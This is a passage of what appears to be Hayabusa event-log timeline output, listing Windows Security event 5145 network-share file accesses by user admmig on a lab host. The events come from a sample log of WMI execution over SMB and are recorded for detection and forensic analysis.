10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
